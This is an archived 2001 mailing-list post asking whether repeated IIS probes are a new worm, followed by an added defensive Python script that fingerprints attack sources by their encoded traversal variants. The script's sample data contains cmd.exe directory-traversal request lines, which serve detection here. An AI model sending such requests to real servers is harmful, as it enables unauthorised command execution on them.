I got these 4 attempts from different sources in a rather small window of time. They all start out with a portscan of port 80, so I don't think it is the same person (Why would they need to rescan each time?). You will note that the order of the variation of the attempts is similar. Is this a new worm? A new tool?

-Steve
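One way to check, from the defender's side, whether several sources run the same ordered set of `cmd.exe` traversal variations (an added example, not part of the original post): label each request by its encoding anomaly and group sources by the ordered label sequence. The source addresses and request lines are constructed sample data, and the function names are hypothetical.

```python
import re
from collections import defaultdict
from itertools import groupby
from urllib.parse import unquote_to_bytes

# Smallest code point that legitimately needs an n-byte sequence; 5- and 6-byte
# forms are from the original UTF-8 design and are never valid today.
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}


def utf8_anomalies(data: bytes):
    """Return labels for overlong or truncated multi-byte sequences in data."""
    labels, i = [], 0
    while i < len(data):
        n = 8 - (data[i] ^ 0xFF).bit_length()    # number of leading 1 bits
        if not 2 <= n <= 6:                      # ASCII, stray continuation, 0xFE/0xFF
            i += 1
            continue
        tail = data[i + 1:i + n]
        if len(tail) == n - 1 and all(b & 0xC0 == 0x80 for b in tail):
            cp = data[i] & (0xFF >> (n + 1))     # payload bits of the lead byte
            for b in tail:
                cp = (cp << 6) | (b & 0x3F)
            if cp < MIN_CP[n]:                   # encoded with more bytes than needed
                labels.append(f"overlong-{n}byte:{chr(cp)!r}")
            i += n
        else:
            labels.append("truncated-lead")      # lead byte without its continuations
            i += 1
    return labels


def classify(request: bytes):
    """Label a request line that reaches cmd.exe through encoded '..' segments."""
    parts = request.split(b" ")
    if len(parts) < 2:
        return None
    path = parts[1].split(b"?", 1)[0]
    if b".." not in path or b"cmd.exe" not in path.lower():
        return None
    labels = []
    if re.search(rb"%(?![0-9A-Fa-f]{2})", path):  # '%' not followed by two hex digits
        labels.append("malformed-escape")
    labels += utf8_anomalies(unquote_to_bytes(path))
    return "+".join(dict.fromkeys(labels)) or "plain-traversal"


def fingerprints(events):
    """Map each ordered label sequence (repeats collapsed) to the sources that sent it."""
    per_source = defaultdict(list)
    for src, request in events:                   # events are assumed to be in time order
        label = classify(request)
        if label:
            per_source[src].append(label)
    shared = defaultdict(list)
    for src, labels in per_source.items():
        shared[tuple(k for k, _ in groupby(labels))].append(src)
    return dict(shared)


# Constructed sample data: documentation addresses, one probe per variation.
TAIL = b"../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
PROBES = [b"%c", b"%c", b"%e0", b"\xf0\x80\x80\xaf",
          b"\xf8\x80\x80\x80\xaf", b"\xfc\x80\x80\x80\x80\xaf"]
SAMPLE_EVENTS = [(src, b"GET /scripts/.." + p + TAIL)
                 for src in ("192.0.2.10", "198.51.100.20") for p in PROBES]
SAMPLE_EVENTS += [("203.0.113.5", b"GET /index.html HTTP/1.0"),
                  ("203.0.113.5", b"GET /scripts/..%c" + TAIL)]

if __name__ == "__main__":
    for sequence, sources in fingerprints(SAMPLE_EVENTS).items():
        print(sources, "->", " | ".join(sequence))
```

Sources that share a long identical sequence are more likely running one tool than acting independently; a source that shows only the first label may simply have been cut short.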
This archive was generated by hypermail 2b30 : Tue May 08 2001 - 07:59:32 PDT